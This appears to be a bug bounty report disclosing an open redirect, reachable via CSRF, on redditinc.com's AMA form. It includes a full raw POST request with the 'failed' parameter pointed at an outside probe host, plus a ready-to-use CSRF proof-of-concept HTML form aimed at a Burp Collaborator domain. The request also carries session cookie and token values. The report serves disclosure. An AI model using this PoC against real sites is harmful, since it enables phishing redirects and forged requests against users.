Open Redirect on www.redditinc.com via `failed` query param

hello dear support I have found the issue on https://www.redditinc.com/ama HTTP request POST /ama HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw Cookie: CRAFT_CSRF_TOKEN=958b77eaad06452d68f0be48c5edf5b0d928b51a6c4afbb5f2f95397f18b43e2a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jZdkLxGgRNVPWIF2OyxH-Lig9pTukLSS8OxYOVST%22%3B%7D;OptanonAlertBoxClosed=2021-07-12T01:35:46.350Z;OptanonConsent=isIABGlobal=false&datestamp=Mon+Jul+12+2021+04%3A35%3A46+GMT%2B0300+(Arabian+Standard+Time)&version=6.13.0&hosts=&consentId=71f221d5-8a57-4a90-9844-0a863bfc837d&interactionCount=2&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0004%3A1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 1508 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 Host: www.redditinc.com Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="action" zendesk/default/submit ------------YWJkMTQzNDcw Content-Disposition: form-data; name="agreement" yes ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description" 555 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="email" [email protected] ------------YWJkMTQzNDcw Content-Disposition: form-data; name="email_confirm" [email protected] ------------YWJkMTQzNDcw Content-Disposition: form-data; name="failed" http://xfs.bxss.me ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name" pHqghUme ------------YWJkMTQzNDcw Content-Disposition: form-data; name="organization" Acunetix ------------YWJkMTQzNDcw Content-Disposition: form-data; name="participants" pHqghUme ------------YWJkMTQzNDcw Content-Disposition: form-data; name="redirect" 74bcbfb4f9c047fb4e467dd203ca3b30f2b31216551ab9db2bf44911c029d506thank-you/ama-form-step-1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="subject" AMA Request ------------YWJkMTQzNDcw Content-Disposition: form-data; name="success" thank-you/ama-form-step-1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="ticket_form_id" 360000307211 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="timeframe" next-week ------------YWJkMTQzNDcw Content-Disposition: form-data; name="timezone" (GMT-05:00) Eastern Time (US & Canada) ------------YWJkMTQzNDcw-- =============================================================== vuln here :Content-Disposition: form-data; name="failed" http://xfs.bxss.me ------------YWJkMTQzNDcw CSRF PoC <html>  <body> <script>history.pushState('', '', '/')</script> <form action="https://www.redditinc.com/ama" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="zendesk/default/submit" /> <input type="hidden" name="agreement" value="yes" /> <input type="hidden" name="description" value="555" /> <input type="hidden" name="email" value="sample@email.tst" /> <input type="hidden" name="email_confirm" value="sample@email.tst" /> <input type="hidden" name="failed" value="http://0bc7dpd4u9tmsh9ruo3n8644pvvlja.burpcollaborator.net" /> <input type="hidden" name="name" value="pHqghUme" /> <input type="hidden" name="organization" value="Acunetix" /> <input type="hidden" name="participants" value="pHqghUme" /> <input type="hidden" name="redirect" value="74bcbfb4f9c047fb4e467dd203ca3b30f2b31216551ab9db2bf44911c029d506thank-you/ama-form-step-1" /> <input type="hidden" name="subject" value="AMA Request" /> <input type="hidden" name="success" value="thank-you/ama-form-step-1" /> <input type="hidden" name="ticket_form_id" value="360000307211" /> <input type="hidden" name="timeframe" value="next-week" /> <input type="hidden" name="timezone" value="(GMT-05:00) Eastern Time (US & Canada)" /> <input type="submit" value="Submit request" /> </form> </body> </html> {F1373178} ## Impact Cross-Site Request Forgery (CSRF) To Open Redirect

Vulnerability Details

Report Details

State

Substate

Submitted

Weakness